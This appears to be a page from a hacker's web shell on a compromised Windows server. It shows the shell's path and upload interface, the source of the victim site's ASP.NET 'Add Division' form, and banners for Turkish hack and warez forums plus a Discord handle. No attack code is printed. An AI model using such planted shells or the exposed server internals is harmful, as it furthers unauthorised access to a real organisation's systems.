FSecurity.Org • Hack Forum • Warez Forum • Hack Forumu • İnstagram çalma • Hacker forum •  Warez Forumu • Hack sitesi • Warez Scriptler

KucukHacker0088 Shell

Current Path : G:/PleskVhosts/mpcdp.in/cmamp.mpcdp.in/cdpp2/

Windows NT SG2NWVPWEB022 10.0 build 17763 (Windows Server 2016) i586
Upload File :
Current File : G:/PleskVhosts/mpcdp.in/cmamp.mpcdp.in/cdpp2/frm_adddivision.aspx

<%@ page language="VB" masterpagefile="~/MasterPage.master" autoeventwireup="false" inherits="frm_adddivision, App_Web_ptpliqvi" title="Add Division" %>

<asp:Content ID="Content1" ContentPlaceHolderID="CPCDP" runat="Server">
  <script type="text/javascript">
  
  function ValidateDropDown() {
    var cmbID = "<%=DD_CompanyName.ClientID %>";
    var cmdDistr="<%=Txt_Division.ClientID %>";
    
    if (document.getElementById(cmbID).selectedIndex == 0) {
        alert("Please Select the Company");
        return false;
    }
    
    if (document.getElementById(cmdDistr).value == "") {
        alert("Please Enter the Division");
        return false;
    }
     
    return true;
}
     
       function Confirm() {
         var myBoolean=new Boolean();
     var myBoolean=  ValidateDropDown();
     
     if (myBoolean==true)
     {
            var confirm_value = document.createElement("INPUT");
            confirm_value.type = "hidden";
            confirm_value.name = "confirm_value";
            if (confirm("Do you want to save data?")) {
                confirm_value.value = "Yes";
            } else {
                confirm_value.value = "No";
            }
            document.forms[0].appendChild(confirm_value);
            }
        }
        </script>
    <div style="padding-left: 8px; padding-right: 8px">
        <div id="BasicInfo">
            <table border="0" cellpadding="1" cellspacing="0" style="width: 969px;">
                <tr>
                    <td class="required" style="height: 18px" valign="top" colspan="7">
                        &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
                        &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
                    </td>
                </tr>
                <tr>
                    <td class="required" style="width: 3px; height: 18px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 18px" valign="top">
                    </td>
                    <td style="width: 35px; height: 18px" valign="top">
                    </td>
                    <td style="width: 196px; height: 18px" valign="top">
                    </td>
                    <td style="width: 113px; height: 18px" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 18px" valign="top">
                    </td>
                    <td style="height: 18px; width: 120px;" valign="top">
                    </td>
                </tr>
                <tr>
                    <td class="required" style="width: 3px; height: 18px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 18px" valign="top">
                        Company Name<a href="<%=loadURL()%>" runat="server" id="lnkURL" target="_blank"></a></td>
                    <td style="height: 18px; width: 35px;" valign="top">
                    </td>
                    <td style="height: 18px; width: 196px;" valign="top">
                        &nbsp; &nbsp;&nbsp;&nbsp;
                        <asp:DropDownList ID="DD_CompanyName" runat="server" Width="173px" AutoPostBack="True">
                        </asp:DropDownList><span id="cname" style="color: red; display: none" class="normal"></span></td>
                    <td style="width: 113px; height: 18px" valign="top">
                        Division Name</td>
                    <td class="normal" style="width: 105px; height: 18px" valign="top">
                        <asp:TextBox ID="Txt_Division" runat="server" Width="171px" BorderColor="Silver"
                            CssClass="TextBox" Height="20px" MaxLength="100"></asp:TextBox></td>
                    <td style="height: 18px; width: 120px;" valign="top">
                    </td>
                </tr>
                <tr>
                    <td class="required" style="width: 3px; height: 14px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 14px" valign="top">
                        &nbsp;</td>
                    <td style="height: 14px; width: 35px;" valign="top">
                    </td>
                    <td style="height: 14px; width: 196px;" valign="top">
                        <span id="curl" style="color: red; display: none" class="normal">&nbsp;</span></td>
                    <td style="width: 113px; height: 14px" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 14px" valign="top">
                    </td>
                    <td style="height: 14px; width: 120px;" valign="top">
                        &nbsp;</td>
                </tr>
                <tr>
                    <td class="required" style="width: 3px; height: 14px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 14px" valign="top">
                    </td>
                    <td style="width: 35px; height: 14px" valign="top">
                    </td>
                    <td style="width: 196px; height: 14px" valign="top">
                        &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;
                        <!-- <a href="<%=SetUrlForDuplicatCompny()%>"  runat="server" id="LnkOpencompany1"    target="_blank"   visible ="false"   >Duplicate URL Company</a>
                                                <a href="<%=SetDuplicatUrlForCompny()%>"  runat="server" id="LnkOpencompany2" target="_blank"   visible ="false"   >Duplicate URL Company List</a>-->
                    </td>
                    <td style="width: 113px; height: 14px" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 14px" valign="top">
                    </td>
                </tr>
                <tr>
                    <td class="required" style="width: 3px; height: 15px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 15px" valign="top">
                        <asp:Button ID="BtnAssignTo" runat="server" Text="Save Company" CssClass="normal"
                            Width="106px" OnClick = "OnConfirm"  OnClientClick = "Confirm()"  /></td>
                    <td style="width: 35px; height: 15px" valign="bottom">
                    </td>
                    <td style="width: 196px; height: 15px" valign="top">
                    </td>
                    <td style="width: 113px; height: 15px" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 15px" valign="top">
                    </td>
                    <td align="left" style="height: 15px; width: 120px;" valign="top">
                    </td>
                </tr>
                <tr runat="server" id="passhide" style="display: none;">
                    <td class="required" style="width: 3px; height: 1px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 1px;" valign="top">
                    </td>
                    <td style="width: 35px; height: 1px; font-size: 12pt;" valign="top">
                    </td>
                    <td style="width: 196px; height: 1px; font-size: 12pt" valign="top">
                    </td>
                    <td style="width: 113px; height: 1px; font-size: 12pt;" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 1px;" valign="top">
                    </td>
                    <td style="height: 1px; width: 120px;" valign="top">
                    </td>
                </tr>
                <tr runat="server"   style="display: none;">
                    <td class="required" style="width: 3px; height: 2px" valign="top">
                    </td>
                    <td class="normal" style="width: 127px; height: 2px" valign="top">
                    </td>
                    <td style="width: 35px; height: 2px" valign="top">
                    </td>
                    <td style="width: 196px; height: 2px" valign="top">
                    </td>
                    <td style="width: 113px; height: 2px" valign="top">
                    </td>
                    <td class="normal" style="width: 105px; height: 2px" valign="top">
                    </td>
                    <td style="height: 2px; width: 120px;" valign="top">
                        <!-- <asp:TextBox ID="TxtStatusDescription"    onkeydown ="javascript:showRed(event)"   runat="server" Height="20px" TextMode="MultiLine"
                                                Width="175px"></asp:TextBox>
                                            <asp:CustomValidator ErrorMessage="Status Description limits 1000 characters" ID="LengthValidator1"
                                                ValidationGroup="val1" runat="server" ClientValidationFunction="LengthCheckST"
                                                ControlToValidate="TxtStatusDescription" CssClass="normal" Display="Dynamic"
                                                ForeColor="#C00000"></asp:CustomValidator>-->
                    </td>
                </tr>
            </table>
        </div>
    </div>
</asp:Content>

Discord hacker0088#9402

FSecurity.org
IP Adresiniz :D